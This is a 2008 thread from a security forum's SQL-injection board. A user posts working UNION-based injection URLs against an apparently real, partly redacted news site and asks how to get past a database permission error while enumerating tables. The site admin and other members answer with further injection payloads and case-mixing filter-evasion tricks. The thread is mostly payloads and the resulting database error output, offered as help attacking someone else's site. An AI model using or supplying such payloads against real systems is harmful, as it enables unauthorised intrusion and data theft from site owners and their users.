|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL Injection troubles : SELECT command denied |
|
Posted: Mon Oct 20, 2008 9:19 pm |
|
|
pinkman |
Regular user |
|
|
Joined: Oct 21, 2008 |
Posts: 5 |
|
|
|
|
|
|
|
Hi all,
I've got some troubles with a sql injection :
Code: |
http://**/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,group_concat(schema_name),7,8,9,10,11,12,13,14+from+information_schema.schemata/* |
It says :
Code: |
SELECT command denied to user '***_actualites'@'localhost' for table 'schemata' |
NB : the columns 6 and 7 are vulnerable
The version of mysql is 4 and I had to use unhex(hex(@@version))
Code: |
homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,unhex(hex(@@version)),7,8,9,10,11,12,13,14/* |
which give : Code: | 4.1.11-Debian_4-log |
Another strange thing that I do not understand :
Code: | http://***actualites/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from%20admin/* |
The answer :
Code: |
Table '***_actualites.admin' doesn't exist |
So my questions are :
1.How do I bypass this restriction ?
2.Do I Have to use Blind SQL INJECTION because of the mysql 4 ?
3.If I had to use unhex(hex(@@version)), are the sql injection code should had been in hex(sqlcode) ?
NB : The following papers I use : http://milw0rm.com/papers/225
Thanks |
|
|
|
|
|
|
|
|
Posted: Mon Oct 20, 2008 11:00 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try "information_schema.tables", it should be accessible.
And if you use UNHEX(HEX(@@version)), then result is plaintext, not hex-encoded. |
|
|
|
|
Posted: Tue Oct 21, 2008 11:30 am |
|
|
pinkman |
Regular user |
|
|
Joined: Oct 21, 2008 |
Posts: 5 |
|
|
|
|
|
|
|
That doesn't work
Code: | http://****/actualites/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,group_concat(schema_table),7,8,9,10,11,12,13,14+from+information_schema.tables/* |
Which give the same things : Code: | SELECT command denied to user '***_actualites'@'localhost' for table 'tables' |
What I think is that the user doesn't have the rights/permissions to use the commande SELECT.
So in this case how could I do?
Thanks |
|
|
|
|
Posted: Tue Oct 21, 2008 11:54 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this:
Code: |
http://****/actualites/homepage-liste.php?rubrique=-1+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14+FROM+information_schema.tables+LIMIT+1,1/*
|
|
|
|
|
|
Posted: Wed Oct 22, 2008 4:30 pm |
|
|
pinkman |
Regular user |
|
|
Joined: Oct 21, 2008 |
Posts: 5 |
|
|
|
|
|
|
|
Still doesn't work
Code: |
SELECT command denied to user '***_actualites'@'localhost' for table 'tables'
|
|
|
|
|
|
Posted: Wed Oct 22, 2008 6:09 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
OK, my mistake ... i should have realized before, that you have mysql version < 5.x, so no information_schema here ... |
|
|
|
|
Posted: Wed Oct 22, 2008 10:15 pm |
|
|
pinkman |
Regular user |
|
|
Joined: Oct 21, 2008 |
Posts: 5 |
|
|
|
|
|
|
|
Yep, that's the bad thing.
So I have to use Blind SQL Technics.
But there is still one last question ; why the user can't use the SELECT SQL command? |
|
|
|
|
Posted: Tue Feb 10, 2009 5:26 pm |
|
|
sangteamtham |
Beginner |
|
|
Joined: Feb 10, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
Change sth like
UnIon SelECT **** FrOm informtion_schema.tables--
or /* |
|
|
|
|
Posted: Tue Feb 10, 2009 6:04 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
sangteamtham wrote: | Change sth like
UnIon SelECT **** FrOm informtion_schema.tables--
or /* |
It's mysql ver. < 5.0 with no information_schema ... |
|
|
|
|
Posted: Tue Feb 10, 2009 6:10 pm |
|
|
ingh1pped |
Advanced user |
|
|
Joined: Dec 13, 2008 |
Posts: 88 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|